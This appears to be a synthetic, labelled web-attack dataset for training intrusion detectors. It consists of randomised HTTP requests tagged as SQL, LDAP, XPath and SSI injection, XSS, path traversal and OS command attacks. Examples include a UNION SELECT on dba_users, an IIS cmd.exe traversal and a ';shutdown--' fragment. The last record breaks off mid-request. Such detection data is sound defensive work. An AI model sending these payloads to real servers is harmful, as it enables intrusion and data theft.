Last-Modified: Tue, 14 Aug 07 04:17:54 UTC
Host: 137.81.170.222
Connection: oHarDM
Accept: image/gif;q=0.3
Accept-Charset: x-mac-turkish;q=0.3
Accept-Encoding: gzip;q=0.3, compress;q=0.6
Accept-Language: ';  shutdown--
Cache-Control: only-if-cached
Client-ip: 228.125.37.130
Cookie: fwt9=agKV6QuCM0Un;tlphrjaedMsf=ud>j;mi1c7tainmieh=1s;gthqeogmashr6i=sjBRbcs;nwdiiR=9632732
Cookie2: $Version="83"
Date: Thu, 18 Sep 08 23:31:24 GMT
ETag: W/"zWOZOtFD3@m4-wmQgAw"
Expect: thse=41osoq;itilCa
From: Oet0ltm@iaaEjEAa1.fr
If-Modified-Since: Thu, 05 Feb 04 08:10:03 UTC
If-Unmodified-Since: Mon, 22 Sep 08 13:04:42 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Jul 07 08:21:03 CET
Max-Forwards: 7
MIME-Version: 9.7
Pragma: lk=lhe7rwgf
Proxy-Authorization: Basic Z3Q1ZHZvSTp0c29ubw==
Authorization: Basic cmxlZXdhbDI6dHRmczBhcw==
Range: -124964,11478-05
Referer: http://nesg.net/iitott/d7ssd.nsf
TE: gzip,gzip,gzip;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/2.9 (compatible; Konqueror/1.6; Open BSD i386; 5Rue)
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/2.9 www.sncwe.tiff, HTTP/2.8 www.urfzss.gif
Transfer-Encoding: compress
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 745 www.otrKU.jpeg "mdsiI" "Sun, 31 Jul 05 23:34:34 CET"
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

sm=8itG&arueaHgtefeonsr=uranfspoefn&soscSrearn=0&tan=ctta&2stylehmN=hehwwy&Nspg8insesrceEo=tshutdownhpr&YgVSsystem.bina@K=aQ.Sp@4ocZi&Dmest=li5elodwstdin&vtakhitunE=4127994567&likeQ17kdivH_processing-instruction=28828583&k5iUe9Q=sctmntbipt&xp_SdISqc3J=d8dwf&aul5uae=siumj&luwLrtH=46

End - Id: 42704
Start - Id: 39009
class: LdapInjection
PUT /ncLmx6zzFdaq/6nuwAOL1Fofoyv/og/BY5UdHrmqYl4/xa7nqttuMYu/.objectLA9-TKqV/jR.o8SK_rkO@7b/pqsgrbi-lycnq/passthrutk_usr.aspx? HTTP/1.1
Content-Length: 233
Content-Language: aeyjp,nsit1vr
Content-Encoding: compress
Content-Location: http://www.nmrrn.net/ieenee/wewl/seho.asmx
Content-MD5: YXJ0b2FHbzVycmNhb3BncA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Aug 07 08:07:27 CET
Last-Modified: Sun, 22 Nov 09 04:41:52 GMT
Host: www.ahjsU.net:43712
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: mihi7r8-cioie6Hh
Cache-Control: only-if-cached
Client-ip: 214.151.138.241
Cookie: orsseerl9l4=s
Cookie2: $Version="1"
Date: Sat, 26 Apr 08 12:50:43 GMT
ETag: W/"Pyd87k1Qm0CacE8"
Expect: 9OgnnhD
From: aa3e@ldqettoe.de
If-Modified-Since: Fri, 11 Nov 05 19:24:03 GMT
If-Unmodified-Since: Tue, 05 Dec 06 23:04:18 CET
If-Match: "hFFt32UnjZ5MllxO.KQ"
If-None-Match: *
If-Range: *
Max-Forwards: 4132
MIME-Version: 4.7
Pragma: txtERhVi='orCpdsgA'
Proxy-Authorization: Basic YW5tc2U3OmJob3MzbA==
Authorization: ert0n sthc=a0hw
Referer: /oheb/Ohns6gp/dUes.cfm
TE: chunked;q=0.4,trailers
Trailer: Expect
User-Agent: stnto)( |(Tta=*)
UA-CPU: x86
UA-Color: color16
UA-Pixels: 1899x922
Via: FTP/5.5 45.231.83.216, 9.1 44.162.178.114, 5.3 www.r8rri.png:098
Transfer-Encoding: gzip
Upgrade: li7sr/6.8, rawA/9.1, eoh3s/1.0, 7rs/2.6, nwr/4.9
Warning: 717 67.113.202.67:1 "ssl4asgs3riaesdgfrre" 
X-Forwarded-For: 137.88.250.0
X-Serial-Number: 168824

4npEadae=4&pos2esslce1=2261331&aeigEdeu=homn&BHyG=99949&ecaleh=dn&ttera=all7<n9erhusams4we&rdKweS=a8axdsct e&baSereizneOz4hh=53661&ariesehcs=||)&iiTeaqbdmyfh=hoTaotcnfetlLtci&8it1fGyn=23783189&TaNnnr=aMDsPb34R7&sysnmymrta=iar

End - Id: 39009
Start - Id: 40743
class: SSI
GET /oEvv/DkClsVykexectmps6FHw/tV2/rY.css?ZoB7jjFo=7161481151&aco3hnPoevnTcl=w&xn7=0dwt&seneormhefwa3qi=aveti9hpieuea&Xtc0Z=echoucd5&h-NqkVd7A=gfXqSwzP&2be=0 HTTP/1.1
Host: www.0t5cxshYe.uk
Connection: keep-alive
Accept: audio/basic
Accept-Charset: iso-8859-8-i, iso-2022-jp
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-cache
Cookie: oEfsjeswnapeds1=<!--  #odbc   statement=  "select 0tte,  wFrhoo,   vxe  from    9ldeo1twt1 order    by   6,     92,  8"     -->;ut=SH
Date: Thu, 22 Apr 10 19:31:49 GMT
ETag: W/"xkz@IPcc@XXaeDPAvcNH"
If-Modified-Since: Mon, 31 May 04 16:36:15 UTC
If-None-Match: "EqeoGvg8UywwApZhF0lM"
If-Range: Thu, 29 Apr 10 08:52:08 UTC
Max-Forwards: 7521
Pragma: nhrjizF='smmotAE'
Referer: /et0de.bin
User-Agent: narlvcejtha
UA-OS: Windows NT
UA-Color: color8
Via: 0.6 67.90.130.9:0469, dvqee/1.3 www.8iksecf.jpg
Transfer-Encoding: compress
Warning: 918 165.10.25.125 "hjreare" 
X-Serial-Number: 0148661754
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40743
Start - Id: 39092
class: LdapInjection
PUT /e3eafrbeh3uei/se8NteaDcva/o2c/sXvVvuq0Z/r9Exvvw.jpeg? HTTP/1.1
Content-Length: 63
Content-Language: doyt0i,annq5o,ei0
Content-Encoding: gzip
Content-Location: http://www.3nhiAsag.com/RtihsC.jpg
Content-MD5: aXN3N3hOc2llZXYyT0NsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 28 Jun 09 17:50:52 UTC
Last-Modified: Wed, 02 Mar 05 19:13:56 GMT
Host: www.dloF2ssn.net:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: 21-9at
Cache-Control: only-if-cached
Client-ip: 62.174.103.47
Cookie: gulnieo=7;cuhjcetlaeemnfl=>;anod=Te)(&(objectClass   =   ls*);ahsaneszpdttoi9=740036819
Cookie2: $Version="3"
Date: Sun, 26 Apr 09 04:18:52 CET
ETag: W/"Ul3leZfEGuwO5Xs2d"
Expect: aelE
From: sqarh@agbp.net
If-Modified-Since: Thu, 09 Apr 09 13:36:56 UTC
If-Unmodified-Since: Tue, 15 Feb 05 08:55:30 CET
If-Match: "VvWS0thTlFIQ2o60fq"
If-None-Match: *
If-Range: Sun, 15 Aug 04 23:53:11 UTC
Max-Forwards: 4
MIME-Version: 8.7
Pragma: f=fCcha
Proxy-Authorization: NTLM ZnJlRm40cmlHbW90bGVuYXN4a01FSEFhZXJCZW5vYnFvaHI2ZWtsMHZ5
Authorization: resbs Vief9il=autmg
Range: 8423-,-27344,42365-2055
Referer: http://www.nErgOc.it/tgro3oF/orrehl/ap0g/lotweotl.mpg
TE: deflate;q=0.6
Trailer: Cache-Control
User-Agent: Mozilla/5.9 (X11; U; Solaris 2.1; nO-co; rv:7.7.5) Gecko/54870697
UA-CPU: PowerPC
UA-Disp: 8142,329,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 345x6601
Via: 9.1 245.92.227.142, 2.0 www.hTotrhe.jpeg
Transfer-Encoding: identity
Upgrade: reo7a/2.4, seeqii/1.1, eaejz/1.9, stk1e/6.4, ios/1.7
Warning: 989 235.4.246.50 "AebkkneSsd2iipjd" "Fri, 17 Feb 06 22:50:23 GMT"
X-Forwarded-For: 171.128.179.42
X-Serial-Number: 173254856208744032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

ahtzeg9lsawA=550504&LscriptCpse=3243295&jocnmdtt5hnw8=878986037

End - Id: 39092
Start - Id: 48631
class: XPathInjection
PUT /shutdownM0RRYdu1scripttCXeval/O8re1arMSt/nopenzceTTt.js? HTTP/1.1
Content-Length: 190
Content-Language: e
Content-Encoding: deflate
Content-Location: /mebatqt/crecre/a8tc/ertm/e6kG.mdb
Content-MD5: dDRzYWRtSmV1aWVsU29yUQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Mar 06 18:14:11 CET
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: 46.41.102.128
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, cp-950;q=0.0, iso-8859-8-i;q=0.9, us-ascii;q=0.8, x-mac-greek;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 212.18.180.154
Cookie: W0Hh=/C>
Cookie2: $Version="46"
Date: Mon, 26 Mar 07 19:15:03 GMT
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: 100-continue
From: wsnewerh@atausf.it
If-Modified-Since: Sat, 31 Jul 04 01:27:04 CET
If-Unmodified-Since: Fri, 03 Dec 04 20:10:26 CET
If-Match: *
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Thu, 08 Dec 05 02:29:33 CET
Max-Forwards: 19
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM NzFFaHNycmUzNURzZGRydElFaFNuc2Rlb3Jzc3RlM2FvNWlleWxTbGJpRFZ0ZA==
Authorization: Basic bHQwU3JTTzpSaXhpZWVw
Range: -046912,8351-4,007308-22
Referer: http://rloi.com/tIiaeOr/tr5eaes/idtvp/Miejnlq/hrtRr.tiff
TE: deflate;q=0.2
Trailer: Range
User-Agent: e5IjHri http://www.a02eh.cz
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: HTTP/3.1 66.162.17.172
Transfer-Encoding: gzip
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2iitenACtlaeE=4&ezoh7i5L=(i  < count(rmea/child::text())    and    j  <  count(tdfA/child::comment())    and  k  <    count(bIm/child::*)    )

End - Id: 48631
Start - Id: 35473
class: XPathInjection
GET /ers/rlnmoLnrefEnbteEfAgu.cgi?AzmG-=yOrmshfieyto&n8nbbpren=33&meaTo1si2=503698 HTTP/1.1
Host: 125.154.224.251:306
Connection: dmnr
Accept: image/*;q=0.7, video/*, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: 26     or count(path/child::node()[position()=((i+j+k+l+1)]    |     path/child::*()[position()=(k+1)])=1    or 4818=
Cache-Control: min-fresh=993
Client-ip: 59.239.90.47
Cookie: tWoghfulits=gohzm2TA5
Cookie2: $Version="6"
Date: Tue, 25 Jul 06 15:07:13 UTC
ETag: "dFInZO7AAV.iTnAMyce"
Expect: 100-continue
From: djepela@Ereu.st
If-Modified-Since: Wed, 08 Aug 07 02:04:51 CET
If-Unmodified-Since: Fri, 30 Oct 09 24:57:51 UTC
If-Match: *
If-None-Match: ".dgSZX4FqE7N2XCKf"
If-Range: "UqLtyWee9A0mveZ"
Max-Forwards: 853
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: aisd RhjLhrht=aojbCnu
Authorization: NTLM QWFvak5hY2MwaHJ0ZHRlVHI4Z2xlYXRyeWVyOGZnbjZha2FpdWI=
Range: 527-,12-81
Referer: /iexi/io2ass/s6dv.bin
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: 0nEfnx
UA-CPU: MIPS
UA-Disp: 1801,706,8
UA-Color: color16
Via: 0.7 178.146.96.84, FTP/0.3 www.m4aef.js, FTP/4.9 www.eeTl.png:2
Transfer-Encoding: gzip
Warning: 084 www.rse4aa.htm "nhtTetlnisasnnesic" "Thu, 10 May 07 21:23:05 UTC"
X-Forwarded-For: 140.122.154.142

null

End - Id: 35473
Start - Id: 35601
class: XPathInjection
GET /AUWd/uhm/u7MkcatsE/6WLvQlst3b3vWrT766/ceyurahfsntdukat/2.Giexecvwindow.openbwgetWE.hk-.asp?l0ieiL=8Dlzc8%40&go6tr=562502&d-vselectuCWy=%2Bibsi&nqj1Col=thfatlz%27+or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+%27EIoOt%27%3D++%27&tRrOoDnbcdpseam=Dufiesdocumenti&TmwhQ=axe3%3Fr2sjlh&_PMDCAYEt1Et=eeneeRn&DjYrodivh1_a=72137 HTTP/1.1
Host: 216.120.110.108
Connection: cfme
Accept: application/*
Accept-Charset: cp-936, x-mac-arabic, gb2312
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: max-age=50152
Client-ip: 132.226.188.115
Cookie: YX@L=l'rosUcouli4rhfromssnf;ffn4sgfDnco=892
Cookie2: $Version="52"
Date: Fri, 14 Mar 08 10:00:39 CET
ETag: W/"tF5Sw0AaliY@Erh7FZ"
Expect: qiiw
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sun, 31 Jan 10 06:05:04 CET
If-Unmodified-Since: Wed, 30 Aug 06 12:30:35 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: "EqszOohtJcbcnkQhD"
Max-Forwards: 084
MIME-Version: 4.7
Pragma: msAtteao='pfv'
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: RTEehi n0ae=metS
Range: 1278-6
Referer: /ecm5s/eiusrati/tnoarme/gdns.cfm
TE: gzip;q=0.8,trailers
Trailer: Warning
User-Agent: dmm4ga (dHOuVWe; aMT0LerDi; xZ6mcFR)
UA-CPU: 68000
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 138x439
Via: 3.2 www.mhSxD724.gif
Transfer-Encoding: compress
Upgrade: 0tfj/9.0, 9ledtn/8.4
Warning: 189 www.shodin.tiff:54 "hwauAetaeeeSes4" "Tue, 24 Mar 09 21:44:06 CET"
X-Forwarded-For: 93.7.188.203
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35601
Start - Id: 48587
class: XPathInjection
PUT /Sslrmiitfas7a/TSchttps__9-6.php3? HTTP/1.0
Content-Length: 319
Content-Language: reaahe
Content-Encoding: identity
Content-Location: /oMtessr/potf/exeau/tBenai.php3
Content-MD5: NjVuc2hiZWhocmR1YXNFdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Nov 06 05:05:19 UTC
Last-Modified: Tue, 11 Oct 05 06:34:50 CET
Host: 236.93.138.165:80
Connection: siswta
Accept: application/zip, text/html, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=6752
Client-ip: 58.151.109.14
Cookie: 5Vz-SR@=cthaaira9Ra;tu=3387;m0tAtqaazd=54731257;0nn31=re]eiair1
Cookie2: $Version="380"
Date: Thu, 24 Mar 05 11:06:15 GMT
ETag: W/"g6dEmBv81@mImtM6koU@"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Wed, 26 Apr 06 08:51:00 CET
If-Unmodified-Since: Wed, 08 Dec 04 01:26:24 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Sun, 08 Jun 08 23:43:40 UTC
Max-Forwards: 423
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest response="7fFB26efC9Fd9d2Aac334296DcDC1b71"
Authorization: Basic N2V6cjphZXVxaWk3
Range: 39-76,5-4266
Referer: http://rIes.uk/pMsawehI/n3ivsnft/rIxt/tellid/dscy0uoe.jsp
TE: deflate;q=0.1,trailers
Trailer: Pragma
User-Agent: Mozilla/5.2 (Windows; U; WinNT 0.4; ti-os; rv:9.3.0) Gecko/11348387
UA-CPU: 68000
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 853x5228
Via: 1.9 www.ierale.css
Transfer-Encoding: Oocesg; yihiw=2shm8kth
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 41138293275827237103
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dmtcaesitee=azyotfohcutaosn&ta6ewusfhvBrff=nsufem~rorvr$&rtahenab5=s&i7tfl8oi=5466869&sqlegee2=8590551960&ssbOpaiauaC2rhs=aoeoysO<us&eoxyafee=nab%et3&e2shaukres=f/ohreos/t1jo6/child::node()[position()=777] or    '5soru'   =    '&gBX6=O%utm&redgewya=oya&SP9-9=sSQhumoghdnoretnEz

End - Id: 48587
Start - Id: 45845
class: PathTransversal
GET /g9-nBoxIo7rNJ.BHP/ed4fdirGoC@bTnFr3ZJ/mllugmng87almdud/5irAo/duHnW/q4divkU/inRvs2CtObodyrmrm/zFabm@UF/nmDi_YO0806iojxqUt.js?ar=%24dsmRh4of&Rese5n8dGsthtmk=p0QXh3rX6ZQ&i7wr67oer=4223&aagtnka=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fde%2Fietoaltost%2Fndon%2Fnanatristr.nsf&SMUFMKQ=smincludesvOa&xueiwzn7PdtsF=113614560&djjlcri=667 HTTP/1.0
Host: 13.249.97.162
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: bFrto-s6lj, bi3-he, tUlr-qiuttq8;q=0.2, e-nWer, gwrOsidO-v2lehv
Cache-Control: max-age=1
Client-ip: 145.76.47.201
Cookie: eolrs=tiad eeascript'Gai2htpass-dnt;Ohdwceen=620;w6noee8hl4wN=r
Cookie2: $Version="59"
Date: Sun, 17 Feb 08 22:46:12 GMT
ETag: W/"aJyevn6vEVafqY5vIsv4"
Expect: 100-continue
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Mon, 21 Aug 06 12:44:36 GMT
If-Unmodified-Since: Sun, 19 Dec 04 04:58:37 CET
If-Match: "wCKfAVscJRiyLtAZJk."
If-None-Match: *
If-Range: Fri, 02 Jun 06 09:42:31 GMT
Max-Forwards: 88
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Digest qop=auth-int
Range: 248-
Referer: /3oeyyw/IrLsacM/lssbTlN/yoem/ecke.shtml
TE: deflate,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 5.8; hl-O7; rv:5.6.2) Gecko/60541812
UA-CPU: Sparc
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 271x8605
Via: FTP/7.6 www.eiohilm.jpeg, FTP/5.3 147.230.170.29
Transfer-Encoding: compress
Upgrade: inw5/1.5, wwesr/8.9, 5rte/1.6, d8hhli/8.3
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Forwarded-For: 192.106.81.122
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45845
Start - Id: 48670
class: XPathInjection
PUT /dzaGwKK/koXkx/smq/qzg@Alh74tjfuph/sT/etft/st9/ttei/AqVbshutdownkizm/childU_qG0C/qWd9PpBSc9wiK@OX@/5lpUlMChKfrom_u-Ny.html? HTTP/1.1
Content-Length: 231
Content-Language: 2aso
Content-Encoding: identity
Content-Location: /tak11ntr/pcerOkF/ntu1/Ldqsdhr.tar.gz
Content-MD5: dGllZ2V0UXNocmdlN2luag==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Aug 05 07:52:29 CET
Last-Modified: Thu, 10 Mar 05 23:41:32 GMT
Host: www.93as8wf7r.de
Connection: close
Accept: audio/basic, application/postscript, image/*
Accept-Charset: iso-8859-2, iso-8859-6;q=0.5, windows-1253;q=0.4, iso-8859-1;q=0.5, windows-1257;q=0.0
Accept-Encoding: 
Accept-Language: b-Y;q=0.3, rpgl6c-ptoaAeG0, nrznrsu-qob, era-etplruts
Cache-Control: max-stale
Client-ip: 94.68.181.174
Cookie: safeenaii=85801;no4qt=032984;1ojoyp='8;0at4ae=]eelL>eMaac;snh5ou=tLCN3r8wM
Cookie2: $Version="97"
Date: Sat, 04 Feb 06 22:08:17 GMT
ETag: W/"rOBiqjbhOHqjJpd"
Expect: 4Dsu
From: e32rlse@ib5bceaa.org
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Thu, 02 Oct 08 06:32:48 CET
If-Match: *
If-None-Match: *
If-Range: "Dq@hqaIle13M7L2QGj@-"
Max-Forwards: 951
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHNlbTppbWhz
Authorization: Digest algorithm=MD5
Range: 12-
Referer: http://www.CnkiEn.de/r82to/heh9tac/orcep/trnnhlb6.bin
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: srO3jbPh6a http://www.ffwfbt.gov
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: FTP/5.0 www.l4ibv.tiff, 9.9 229.103.233.137, HTTP/4.8 20.51.159.126
Transfer-Encoding: identity
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 105.28.18.229
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

O5nngceiwd2=rc'    or     1<   ot/o6i/isdE/child::text()[position()=69]    or 'evHeoha'    = '&uduaetle=158833161&yannenmlnesOs=362406682&whthotrl=bkv8swsxeui&e3v=21&ngnnnw2mlshtbit=7cnsseuohills

End - Id: 48670
Start - Id: 46961
class: XSS
PUT /ytrizuonpe/tgrea0nfscitru/I5sIqxrPT/8RxA6X.asp? HTTP/1.0
Content-Length: 320
Content-Language: T,oca9e,pbcsel
Content-Encoding: deflate
Content-Location: http://hLes.gov/ASeagxi.html
Content-MD5: YTdvdGZobzl0b2xodDJlaw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Apr 05 08:29:42 GMT
Last-Modified: Mon, 30 Nov 09 19:27:56 CET
Host: 112.204.7.10
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.4, deflate
Accept-Language: esauioy-hitaecO, e6Ddq-u
Cache-Control: max-stale
Client-ip: 248.152.241.195
Cookie: 4ze=1;tnt2a=include=e;shfEde=t@GR;CMXx=2kbaegesi;haeLkncdo9=e1givdAa.3u
Cookie2: $Version="609"
Date: Sat, 06 Jan 07 17:40:24 CET
ETag: "6g5uOF.cJy1pW@7l6"
Expect: 100-continue
From: trhir@9toer.gov
If-Modified-Since: Tue, 19 Jan 10 19:55:27 UTC
If-Unmodified-Since: Sat, 12 Jan 08 03:46:11 GMT
If-Match: *
If-None-Match: "adlZDISFzsbWRSS9j."
If-Range: Mon, 08 Mar 10 13:20:16 UTC
Max-Forwards: 738
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ff89aaf3
Authorization: Basic bWVPZHJyZWc6b2FzaHRvdA==
Range: 7-,-974,384-64
Referer: http://www.rgk3naa.de/Tatz6oT.gif
TE: trailers
User-Agent: oegssrTeA2ftyrhtthi
UA-CPU: 68000
UA-Disp: 698,9133,32
UA-OS: FreeBSD
UA-Color: color16
Via: 2.8 www.mlzei.htm, 3.9 www.npnyme.htm:59360, 2.5 www.irHdak.htm
Transfer-Encoding: identity
Upgrade: aef/2.4, poaoke/2.0, 3hsnf/0.2
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

51tu4coceSl05a=94205194&VfW_DPLlsFHU=<script>alert    (eevwROawzeiha6e.m4edog)</script    >&ctm0r=sTmdudoojF9dnjhio&oua=w  2mthttps't(a%t&n7tnn=i&io=23801589&4y=287840679&TPh3ltwrac=n42j&ragHoteaterylnv=lUK&rereeubsi=380&AlikeJ.V=4-EFFt&jrnnbhfan1swig=uci=sioeeeomochaeh\PN&9is=Elb0&d7ge=qbm4reMr

End - Id: 46961
Start - Id: 44823
class: PathTransversal
GET /ecEiMoodTi6.htm?hJ86H9kHTQ=94&niLhdOeia=..%2F..%2F..%2Fes%2Fadmin.txt HTTP/1.1
Host: 16.148.118.61:1358
Connection: TetRna5H
Accept: */*
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=71760
Client-ip: 92.163.213.217
Cookie: eb93urdui=gh3;imqql=ncysLmb0V
Cookie2: $Version="23"
Date: Mon, 24 May 04 01:06:17 GMT
ETag: W/"45NPbgutQsMuP7R"
Expect: esimDnut=sveo7Ee;tqltcis=hoovyr
From: ecsie0r@aat1r.com
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Thu, 26 Feb 09 05:01:22 CET
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "grIOzWd4mODJSc-sGhxE"
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 8895
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: /rgfee/mFigdE/jlfwt/Sdt8og/eniiaeix.php3
TE: gzip
Trailer: If-Range
User-Agent: askJV0.b http://www.4sdoe.ch
UA-CPU: MIPS
UA-Disp: 5327,238,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/8.2 www.feet9sc.js, 1.1 www.ieoBerho.html
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44823
Start - Id: 41773
class: SqlInjection
GET /DMoN/NghaonsR/binktp2/aeevyhoiz81pZvoi/3uvog0odexurdelgl/Y0_@Dhs8l4u/pTG8jBf2RbAg0Nl8u@/uLWRifaAF3aRuo/rlqxcPPmpd6dYr.3/tss.swf?lhnshrotlaagdd=hbK&uegEkefhw9=Adrs+aAtmi&o2nvslcestd=aap&ih=oEmae%27%2F**%2FUNION%2F**%2FSELECT%2F**%2F4da%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Fat2hq%2F**%2Flike%2F**%2F%27%2525&eoOrdbl=oCubnqxVP8V&fKiSh=60 HTTP/1.0
Host: 57.160.67.243:80
Connection: EloopN4E
Accept: image/gif
Accept-Charset: iso-2022-jp;q=0.2, macintosh;q=0.8, windows-1253;q=0.3, hz-gb-2312;q=0.3, iso-8859-1
Accept-Encoding: identity;q=0.7, compress;q=0.2, compress
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 141.135.3.12
Cookie: 2buSlhoiowjh=8709;EoSgaiesA0ciu=inahiiglsf0s;bunotttN=629;dasnlutea=l9Eugnetcatbgsounds+;YNyf=20890102
Cookie2: $Version="86"
Date: Mon, 04 May 09 22:19:51 UTC
ETag: "Sd60XM.NsDcpTEMyeIVx"
Expect: osevnd
From: edbsae7@m3iuOei.biz
If-Modified-Since: Thu, 30 Jul 09 08:38:33 GMT
If-Unmodified-Since: Fri, 21 Oct 05 18:24:09 UTC
If-Match: "vMi_RO7KtheoVXLf.h"
If-None-Match: *
If-Range: *
Max-Forwards: 0045
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic eFN3ZXlpczp0ZWVybXRi
Authorization: Wbah eznew8=ioath
Range: 4234-490888,-164882
Referer: http://www.ismeht.uk/t0e7ne/we2icI/oedt/tsRlp.shtml
TE: chunked;q=0.9
Trailer: Upgrade
User-Agent: inneqie (srQ6Lnvp9v; eo@.gWxBv; oArp2hQY46; nehKvnLZ)
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: HTTP/4.6 10.189.182.10
Transfer-Encoding: identity
Upgrade: baE/8.7, 0es9t/8.9, lisu/3.1, ncnHe/5.8, iuj/3.3
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41773
Start - Id: 43898
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: 130.177.231.164
Connection: 4htron
